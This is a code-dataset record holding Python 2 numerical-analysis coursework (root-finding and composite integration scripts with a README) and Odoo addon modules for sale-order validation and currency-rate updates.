[ { "alpha_fraction": 0.4712207317352295, "alphanum_fraction": 0.49462366104125977, "avg_line_length": 22.969696044921875, "blob_id": "d8c7cfb65dc392a2d3b7ab9170ac117f044b3e79", "content_id": "ee719cc136f366c27ffa5682a07aade7ba0f8db9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1581, "license_type": "no_license", "max_line_length": 66, "num_lines": 66, "path": "/py-code/hw2_Q4(Illi).py", "repo_name": "Yancey2126/Numerical-Analysis-", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom matplotlib import pyplot as plt\n\ntol = 1e-12 # If the \"residual\" |f(x_k)| < tol, stop iteration\nprintouts = True\n\ndef f(x):\n #return np.exp(x) - x - 2\n return x**2 - 2\n \ndef Illi(x0, x1):\n if x0 > x1:\n print 'Initial interval not exist!'\n\n if f(x0)*f(x1) > 0:\n print 'Same sign of interval ends!'\n\n else: \n xkm1 = x0\n xk = x1\n xk_list = [xk]\n residual_list=[abs(f(xk))] \n residual = abs(f(xk))\n\n while residual > tol:\n fkm1 = f(xkm1)\n # Define the iteration in Secant's fashion\n xkp1 = xk - ((xk - xkm1)/(f(xk) - fkm1))*f(xk)\n \n if f(xkp1) * f(xk) < 0: \n xkm1 = xk\n\n else: \n fkm1 = 1/2 * f(xkm1)\n\n xk = xkp1\n fk = f(xk)\n residual = abs(fk) \n\n if printouts:\n print xk, residual\n \n xk_list.append(xk)\n residual_list.append(residual)\n\n return xk_list, residual_list\n \nxk_list, residual_list = Illi(1., 2.)\nprint 'Number of iterations = ', len(xk_list)\n\nPlotting = True\n\nif Plotting:\n fig = plt.figure(2)\n plt.plot(xk_list,'o')\n plt.xlabel('k')\n plt.ylabel('$x_k$')\n plt.title('Illinois\\'s Method Iteration --- x_k ')\n plt.show()\n\n fig = plt.figure(3)\n plt.plot(np.log10(np.array(residual_list)),'o-')\n plt.xlabel('k')\n plt.ylabel('$\\log_{10}(r_k)$')\n plt.title('Illinois\\'s Method Iteration --- convergence rate')\n plt.show()" }, { "alpha_fraction": 0.7062314748764038, "alphanum_fraction": 0.7537091970443726, "avg_line_length": 42.956520080566406, "blob_id": "8359683115e9bf64a0865267cafd050357c868cd", "content_id": "e2c511d0498b042be156b6c20dac9dca0184484a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1011, "license_type": "no_license", "max_line_length": 171, "num_lines": 23, "path": "/README.md", "repo_name": "Yancey2126/Numerical-Analysis-", "src_encoding": "UTF-8", "text": "# Numerical-Analysis-\nMATH/CS 514 coursework ---- University of Wisconsin Madison (Fall 2017)\n\n#### Topics to be covered include:\n* root-finding\n* interpolation\n* polynomial approximation\n* numerical differentiation\n* integration \n* numerical solution of ordinary differential equations.\n\n#### Textbook:\n* ![Suli and Mayers, An Introduction to Numerical Analysis, Cambridge University Press, 2003](https://www.amazon.com/Introduction-Numerical-Analysis-Kendall-Atkinson/dp/0471624896)\n\n#### Programming language used:\n* Python 2.7\n\n#### Code for practice:\n1. root-finding:\n * ![Newton's Method](https://github.com/Yancey2126/Numerical-Analysis-/blob/master/py-code/hw2_Q1(Newton).py)\n * ![Secant's Method](https://github.com/Yancey2126/Numerical-Analysis-/blob/master/py-code/hw2_Q2(Secant).py)\n * ![Bisection Method](https://github.com/Yancey2126/Numerical-Analysis-/blob/master/py-code/hw2_Q3(Bisc).py)\n * ![Illinois's Method](https://github.com/Yancey2126/Numerical-Analysis-/blob/master/py-code/hw2_Q4(Illi).py)\n" }, { "alpha_fraction": 0.5262828469276428, "alphanum_fraction": 0.5456821322441101, "avg_line_length": 20.31999969482422, "blob_id": "32d898e6893b31c0fcd52192fd9c241a99c09476", "content_id": "8f500c6d002868b6c72bc79f4a38f6e526f873e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1598, "license_type": "no_license", "max_line_length": 77, "num_lines": 75, "path": "/py-code/hw2_Q1(Newton).py", "repo_name": "Yancey2126/Numerical-Analysis-", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\ntol = 1e-12 # If the \"residual\" |f(x_k)| < tol, stop iteration\n\ndef f(x):\n# Basic idea, superlinear convergence, comparing Newton, Secant, and Newton2:\n #return np.exp(x) - x - 2\n #return x**2 - 2\n return np.sin(x**2) + 1.02 - np.exp(-x)\n \ndef f_prime(x):\n #return np.exp(x) - 1\n #return 2*x\n return 2*x*np.cos(x**2) + np.exp(-x)\n\nx = np.linspace(-1., 5., 400)\nplt.plot(x,f(x))\nplt.plot(x,np.zeros_like(x),'k-')\nplt.xlabel('x')\nplt.ylabel('f(x)')\nplt.title('Image of f(x)')\nplt.show()\n \n \n\ndef Newton(x0):\n\n # Take an initial guess: \n xk = x0\n \n xk_list=[xk]\n residual_list=[abs(f(xk))] \n residual = abs(f(xk))\n \n \n while residual>tol:\n \n xk = xk - f(xk)/f_prime(xk)\n residual = abs(f(xk))\n \n xk_list.append(xk)\n residual_list.append(residual)\n \n print xk, residual\n \n return xk_list, residual_list\n \n \nxk_list, residual_list = Newton(x0=-1.)\n\nprint 'Number of iterations = ', len(xk_list)\n\n\nPlotting = True\n\nif Plotting:\n \n fig = plt.figure(2)\n plt.plot(xk_list,'o')\n plt.xlabel('k')\n plt.ylabel('$x_k$')\n plt.title('Newton\\'s Method Iteration --- x_k ')\n plt.legend(loc='upper right')\n plt.show()\n \n\n fig = plt.figure(3)\n plt.plot(np.log10(np.array(residual_list)),'o-')\n plt.xlabel('k')\n plt.ylabel('$\\log_{10}(r_k)$')\n plt.title('Newton\\'s Method Iteration --- x_k ')\n plt.legend(loc='upper right')\n plt.show()" }, { "alpha_fraction": 0.47633904218673706, "alphanum_fraction": 0.4955798089504242, "avg_line_length": 23.35443115234375, "blob_id": "6700c38811d62bb2848445a8ba128fdc6abe5513", "content_id": "8308420c67d86665fb7fd850c6430ead8e990eaf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1923, "license_type": "no_license", "max_line_length": 67, "num_lines": 79, "path": "/py-code/hw2_Q3(Bisc).py", "repo_name": "Yancey2126/Numerical-Analysis-", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom matplotlib import pyplot as plt\n\ntol = 1e-12 # If the \"residual\" |f(x_k)| < tol, stop iteration\nprintouts = True\n\ndef f(x):\n #return np.exp(x) - x - 2\n #return x**2 - 2\n return np.sin(x**2) + 1.02 - np.exp(-x)\n \n\ndef Bisection(a0, b0):\n if a0 > b0:\n print 'Initial interval not exist!'\n \n if f(a0)*f(b0) > 0:\n print 'Same sign of interval ends'\n \n else:\n ak = a0\n bk = b0\n \n ak_list = [ak]\n bk_list = [bk]\n error_list = [abs(f(ak) - f(bk))]\n error = abs(f(ak) - f(bk))\n \n while error > tol:\n ck = (ak + bk)/2\n if f(ak)*f(ck) < 0:\n bk = ck\n else: \n ak = ck\n \n error = abs(f(ak) - f(bk))\n \n if printouts:\n print ak, bk, error\n \n ak_list.append(ak)\n bk_list.append(bk)\n error_list.append(error) \n \n return ak_list, bk_list, error_list\n \n \nak_list, bk_list, error_list = Bisection(-0.5, 0.5)\nprint 'Number of iterations = ', len(ak_list)\n \n\nPlotting = True\n\nif Plotting:\n # Plot f(x)\n x = np.linspace(1. ,2. ,400)\n fig = plt.figure(1)\n plt.plot(x,f(x))\n plt.plot(x,np.zeros_like(x),'k-')\n plt.plot(np.array(ak_list),np.zeros(len(ak_list)),'o')\n plt.plot(np.array(bk_list),np.zeros(len(ak_list)),'o')\n plt.xlabel('x')\n plt.ylabel('f(x)')\n plt.title('Bisection\\'s Method Iteration')\n plt.show()\n \n fig = plt.figure(2)\n plt.plot(ak_list,'o')\n plt.xlabel('k')\n plt.ylabel('$a_k$')\n plt.title('Bisection\\'s Method Iteration --- x_k ')\n plt.show()\n\n fig = plt.figure(3)\n plt.plot(np.log10(np.array(error_list)),'o-')\n plt.xlabel('k')\n plt.ylabel('$\\log_{10}(e_k)$')\n plt.title('Bisection\\'s Method Iteration --- convergence rate')\n plt.show()" }, { "alpha_fraction": 0.4971780478954315, "alphanum_fraction": 0.5284761190414429, "avg_line_length": 23.683544158935547, "blob_id": "a983368d3d4ad85682f09decc5b04d4e8a9e10ab", "content_id": "20fe03c3708588dbe353418e58893217d975301d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1949, "license_type": "no_license", "max_line_length": 72, "num_lines": 79, "path": "/py-code/Composite_Rule.py", "repo_name": "Yancey2126/Numerical-Analysis-", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom matplotlib import pyplot as plt\n\n# Define the example function\ndef f(x):\n return np.sin(np.exp(x))\n #return np.sin(x)\n \n#print f(0.)\n\nx = np.linspace(0,2,400)\nplt.plot(x, f(x))\nplt.plot(x, np.zeros_like(x), \"k--\")\nplt.xlabel(\"x\")\nplt.ylabel(\"f(x)\")\nplt.title('Function f(x) = sin(e^x)')\nplt.show()\n\n# Define the Trapezoidal rule\ndef Trapezoidal(f, a, b):\n I = ((b-a)/2)*(f(a) + f(b))\n return I\n\nprint 'Trapezoidal gives ' + str(Trapezoidal(f, 0., 2.))\n\n# The Composite Trapezoidal Rule with N subintervals on [0,2]\ndef Com_Trap(N):\n I = 0\n for i in range(0, N): \n h = 2./N\n xi = i*h\n xiplus = (i + 1)*h\n #print str(xi), str(xiplus)\n Ii = Trapezoidal(f, xi, xiplus)\n #print 'On interval ' + str(i) +', Trapezoidal gives ' + str(Ii)\n I = I + Ii\n return I\n\n# Calculate with h = 1/10, 1/20, 1/40\nfor N in [20, 40, 80]:\n IN = Com_Trap(N)\n print 'with h = ' + str(2./N) +':'\n print 'Composite Trapezoidal Rule approximation is : ' + str(IN)\n I2N = Com_Trap(2*N)\n I4N = Com_Trap(4*N)\n R = (IN - I2N) / (I2N - I4N)\n print 'R ratio is: ' + str(R)\n\n\n# Code up Simpson's Rule\ndef Simpson(f, a, b):\n m = (a + b) / 2\n I = (b-a)/6*(f(a) + 4*f(m) + f(b))\n return I\n \n#print 'Simpson gives ' + str(Simpson(f, 0., 2.))\n\n# Call Simpson's in composite rules\ndef Com_Simp(N):\n I = 0\n for i in range(0, N): \n h = 2./N\n xi = i*h\n xiplus = (i + 1)*h\n #print str(xi), str(xiplus)\n Ii = Simpson(f, xi, xiplus)\n #print 'On interval ' + str(i) +', Trapezoidal gives ' + str(Ii)\n I = I + Ii\n return I\n\n# Test out\nfor N in [20, 40, 80]:\n IN = Com_Simp(N)\n print 'with h = ' + str(2./N) +':'\n print 'Composite Simpson Rule approximation is : ' + str(IN)\n I2N = Com_Simp(2*N)\n I4N = Com_Simp(4*N)\n R = (IN - I2N) / (I2N - I4N)\n print 'R ratio is: ' + str(R)" }, { "alpha_fraction": 0.529411792755127, "alphanum_fraction": 0.5510543584823608, "avg_line_length": 24.394365310668945, "blob_id": "8b49669ecd9591446a308f91af7e91071507b1fa", "content_id": "695b437cbea8139b4b11a354ab8fd69a93a6913c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1802, "license_type": "no_license", "max_line_length": 77, "num_lines": 71, "path": "/py-code/hw2_Q2(Secant).py", "repo_name": "Yancey2126/Numerical-Analysis-", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom matplotlib import pyplot as plt\n\ntol = 1e-12 # If the \"residual\" |f(x_k)| < tol, stop iteration\nprintouts = True\n\ndef f(x):\n return np.sin(x**2) + 1.02 - np.exp(-x)\n \ndef Secant(x0, x1):\n # Two initial guesses\n xkm1 = x0\n xk = x1\n \n xk_list = [xk]\n residual_list=[abs(f(xk))] \n residual = abs(f(xk))\n \n while residual > tol: \n # Calculate the new xk by Secant's definition\n xkp1 = xk - ((xk - xkm1)/(f(xk) - f(xkm1)))*f(xk)\n \n # Update xkm1, xk and residual\n xkm1 = xk\n xk = xkp1\n \n residual = abs(f(xk))\n \n if printouts:\n print xk, residual\n \n # Add new iteration results into the list\n xk_list.append(xk)\n residual_list.append(residual)\n \n if len(xk_list)==200:\n print 'Did not converge after 200 iterations'\n break\n\n return xk_list, residual_list\n \nxk_list, residual_list = Secant(0.9, 1.)\nprint 'Number of iterations(Secant) = ', len(xk_list)\n\nPlotting = True\n\nif Plotting:\n # Plot f(x)\n x = np.linspace(1. ,2. ,400)\n fig = plt.figure(1)\n plt.plot(x,f(x))\n plt.plot(x,np.zeros_like(x),'k-')\n plt.plot(np.array(xk_list),f(np.array(xk_list)),'o')\n plt.xlabel('x')\n plt.ylabel('f(x)')\n plt.title('Secant\\'s VS Newton\\'s Method Iteration')\n plt.show()\n \n fig = plt.figure(1)\n plt.plot(xk_list,'o')\n plt.xlabel('k')\n plt.ylabel('$x_k$')\n plt.title('Secant\\'s VS Newton\\'s Method Iteration --- x_k ')\n plt.show()\n\n fig = plt.figure(2)\n plt.plot(np.log10(np.array(residual_list)),'o-')\n plt.xlabel('k')\n plt.ylabel('$\\log_{10}(r_k)$')\n plt.title('Secant\\'s VS Newton\\'s Method Iteration --- convergence rate')\n plt.show()" } ]
6
GalBrandwine/flask_tutorials
https://github.com/GalBrandwine/flask_tutorials
6e03e0a0e3000b7761e5f58803b8a9996dfa72f8
d9c4f72044730bd41936d53b020aeaf860afd486
c48319136008a42107566c469e16a9eb0a97b9d5
refs/heads/master
2020-04-05T21:22:14.040998
2018-11-18T22:28:41
2018-11-18T22:28:41
157,217,584
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5415225028991699, "alphanum_fraction": 0.5570934414863586, "avg_line_length": 26.5238094329834, "blob_id": "df5e0915063ed72696456245857c5bd0c88ecf60", "content_id": "673fd103e831033907ad82f6b5b05a256a16fe2e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 578, "license_type": "no_license", "max_line_length": 68, "num_lines": 21, "path": "/tests/test_videoCamera.py", "repo_name": "GalBrandwine/flask_tutorials", "src_encoding": "UTF-8", "text": "from utils.camera import VideoCamera\nimport cv2\n\n\nclass TestVideoCamera:\n\n def test_get_frame(self):\n \"\"\"Test if camera captures video. \"\"\"\n\n # setup\n camera = VideoCamera()\n print(\"test\")\n # run\n while True:\n frame_returned = camera.get_frame()\n success, frame_decoded = cv2.imdecode(frame_returned, 1)\n cv2.imshow(\"Decoded\", frame_decoded)\n k = cv2.waitKey(0)\n if k == 27: # wait for ESC key to exit\n cv2.destroyAllWindows()\n assert success is True\n" } ]
1
iceship/marcos_community_addons
https://github.com/iceship/marcos_community_addons
22e053c5957a739d770aa0f6e86b0a9773dcf91d
16c9b861e48e938489f9366e4ee143fb788c946e
758ad9b329fe156e05ea9389a7818614796deeed
refs/heads/master
2021-01-24T14:55:46.663384
2016-07-14T07:54:26
2016-07-14T07:54:26
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5742904543876648, "alphanum_fraction": 0.5767946839332581, "avg_line_length": 30.552631378173828, "blob_id": "85f1abc6c4ab404b6613aa15e3ec5a76683b981b", "content_id": "da3745ab078aa5285db67bdb5355d1b6157d8ac0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1199, "license_type": "no_license", "max_line_length": 123, "num_lines": 38, "path": "/ferrua/models/sale.py", "repo_name": "iceship/marcos_community_addons", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom openerp import models, fields, api, exceptions\nimport re\n\n\nclass Sale(models.Model):\n _inherit = \"sale.order\"\n\n @api.multi\n def action_confirm(self):\n for rec in self:\n mrp_exep = []\n for product in rec.order_line:\n routes_to_built = [route.id for route in product.product_tmpl_id.route_ids if route.id == 6]\n if routes_to_built and not product.product_tmpl_id.bom_count:\n mrp_exep.append(product.product_tmpl_id.name)\n\n if mrp_exep:\n res = \"\"\n for msg in mrp_exep:\n res += u\"{},\\n\".format(msg)\n raise exceptions.ValidationError(u\"Es necesaria la lista de materiales para el producto:\\n {}\".format(res))\n\n return super(Sale, self).action_confirm()\n\n\nclass SaleOrderLine(models.Model):\n _inherit = 'sale.order.line'\n\n position = fields.Integer(u\"Posición\")\n\n @api.onchange(\"position\")\n def onchange_position(self):\n if self.position > 0:\n self.name = u\"[POS: {}]: {}\".format(self.position, self.product_id.name)\n else:\n self.name = self.product_id.name" }, { "alpha_fraction": 0.6641414165496826, "alphanum_fraction": 0.6792929172515869, "avg_line_length": 27.285715103149414, "blob_id": "22f93fe628b16e6e0a152b58c2089ab263e98160", "content_id": "e2eb96880a532586f68c11bd0835b1bab55a9284", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 396, "license_type": "no_license", "max_line_length": 107, "num_lines": 14, "path": "/currency_rates_control/models/res_currency.py", "repo_name": "iceship/marcos_community_addons", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n# NOTE: this code write by Alexis de Lattre <[email protected]> on odoo module Currency Rate Date Check\n\n\nfrom openerp import models, fields, api\n\n\n\nclass res_currency_rate(models.Model):\n _inherit = \"res.currency.rate\"\n\n rate = fields.Float('Rate', digits=(12, 12), help='The rate of the currency to the currency of rate 1')\n name = fields.Date('Date', required=True, select=True)\n" }, { "alpha_fraction": 0.5991929769515991, "alphanum_fraction": 0.603227972984314, "avg_line_length": 42.64706039428711, "blob_id": "10e0282fd24dbc09e7208f8b7b57d5a38354a932", "content_id": "68fb1cef1bdc4c57fe63e03f6c08870d827918c0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1488, "license_type": "no_license", "max_line_length": 137, "num_lines": 34, "path": "/currency_rates_control/wizard/rate_update_wizard.py", "repo_name": "iceship/marcos_community_addons", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom openerp import models, fields, api, exceptions\n\nimport logging\n\n_logger = logging.getLogger(__name__)\n\n\nclass RateUpdateWizard(models.TransientModel):\n _name = \"update.rate.wizard\"\n\n update_method = fields.Selection([('server','Desde internet'),('manual','Introducir tasa manualmente')],\n string=u\"Metodo de actualizaciónn de tasa\", default=\"server\")\n name = fields.Date(\"Fecha\", required=True)\n rate = fields.Float(\"Monto\", requiered=True)\n currency_id = fields.Many2one(\"res.currency\", string=\"Moneda\", readonly=True)\n\n @api.multi\n def update_rate(self):\n if self.update_method == \"manual\":\n if self.rate < 1:\n raise exceptions.UserError(\"El valor de la tasa debe de ser mayor que 0\")\n rate = self.env[\"res.currency.rate\"].search([('name','=',self.name),('currency_id','=',self.currency_id.id)])\n if rate:\n return rate.write({\"rate\": 1/self.rate})\n else:\n return self.env[\"res.currency.rate\"].create({\"name\": self.name, \"rate\": 1/self.rate, \"currency_id\": self.currency_id.id})\n else:\n try:\n self.env[\"currency.rate.update.service\"]._run_currency_update()\n except Exception as e:\n _logger.error(\"{}\".format(e))\n raise exceptions.ValidationError(\"Ocurrio un error al intentar actualizar la tasa desde el servidor de internet.\")\n\n\n\n" } ]
3